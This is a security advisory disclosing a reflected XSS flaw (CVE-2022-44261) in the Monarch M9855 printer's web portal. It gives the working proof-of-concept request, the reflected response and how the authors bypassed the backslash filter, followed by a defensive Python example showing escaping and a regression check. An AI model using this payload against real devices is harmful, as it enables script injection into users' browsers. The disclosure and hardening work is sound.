AveryDennison/AveryDennison_MonarchM9855_XSS/AveryDennison_MonarchM9855_XSS_CVE-2022-44261.txt
Reflected XSS (Cross-Site Scripting) attack - CVE-2022-44261

Vendor: Avery Dennison
Print Model: Monarch M9855
Software Version: Monarch 7411 Print Adapter, Firmware Ver. CAMO-7.68 (2011.06.02), Boot Ver. 7.3
Type: Unauthenticated Remote attack

We have identified that the web portal of the "Monarch M9855" printer device product is vulnerable to Reflected Cross-Site Scripting (XSS). This is because the web application fails to adequately sanitize malicious strings. By leveraging this issue, an attacker is able to cause arbitrary HTML and JavaScript code to be executed in a user's browser within the security context of the affected site. This attack can be used in conjunction with social engineering techniques.

We have managed to bypass the server-side protection since the back-end does not allow the "\" character. Also, the space character should be URL encoded. Therefore, we crafted a URL-encoded payload that didn't contain the "\" character.

Below, evidence is provided.

Request:

GET /%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs%22%29%3E HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

Response:

HTTP/1.0 200 Document follows
Server: XCD WebAdmin
Content-Type: text/html

<html><head><title> ERROR 404</title></head><body><center> FILE /<img src=x onerror=alert("XSSbyIthacaLabs")> NOT FOUND, ERROR 404</center></body></html>
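The root cause shown in the response above is a 404 page that percent-decodes the requested path and interpolates it into HTML verbatim. The following added example (not part of the Ithaca Labs advisory and not the device's firmware, whose code is unknown) contrasts a hypothetical handler with that defect against a hardened one that HTML-escapes the reflected value, and includes a small regression check that can be run against the advisory's own request path. The template string and function names are assumptions chosen to mirror the response body shown above.

```python
from html import escape
from urllib.parse import unquote

# Constructed test input: the percent-encoded request target from the advisory's GET line.
ADVISORY_PATH = "/%3Cimg%20src%3Dx%20onerror%3Dalert%28%22XSSbyIthacaLabs%22%29%3E"

# Hypothetical 404 template that mirrors the shape of the device's response body.
TEMPLATE = ('<html><head><title> ERROR 404</title></head><body><center> FILE '
            '{path} NOT FOUND, ERROR 404</center></body></html>')


def decode_path(raw_path: str) -> str:
    """Percent-decode the request target, as the server does before reflecting it."""
    return unquote(raw_path)


def render_404_unsafe(raw_path: str) -> str:
    """Vulnerable pattern: the decoded path is placed into the HTML untouched."""
    return TEMPLATE.format(path=decode_path(raw_path))


def render_404_safe(raw_path: str) -> str:
    """Hardened pattern: HTML-escape the decoded path (quotes included) before interpolation.

    escape() turns <, >, & and, with quote=True, " and ' into entities, so the browser
    renders the path as text instead of parsing it as markup.
    """
    return TEMPLATE.format(path=escape(decode_path(raw_path), quote=True))


def safe_response_headers() -> dict:
    """Headers for the hardened 404: declare a charset and disable MIME sniffing so the
    browser cannot reinterpret the body under a different encoding or type."""
    return {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }


def reflects_markup(body: str) -> bool:
    """Regression check: does a raw '<' or '>' survive inside the 'FILE ... NOT FOUND' slot?"""
    start = body.index("FILE ") + len("FILE ")
    end = body.index(" NOT FOUND")
    slot = body[start:end]
    return "<" in slot or ">" in slot


if __name__ == "__main__":
    print("decoded path :", decode_path(ADVISORY_PATH))
    print("unsafe body reflects markup:", reflects_markup(render_404_unsafe(ADVISORY_PATH)))
    print("safe body reflects markup  :", reflects_markup(render_404_safe(ADVISORY_PATH)))
    print(render_404_safe(ADVISORY_PATH))
```

The check deliberately inspects only the reflected slot rather than the whole body, since the template itself legitimately contains tags; running it against every error page that echoes user input is a cheap way to catch this class of bug before shipping firmware.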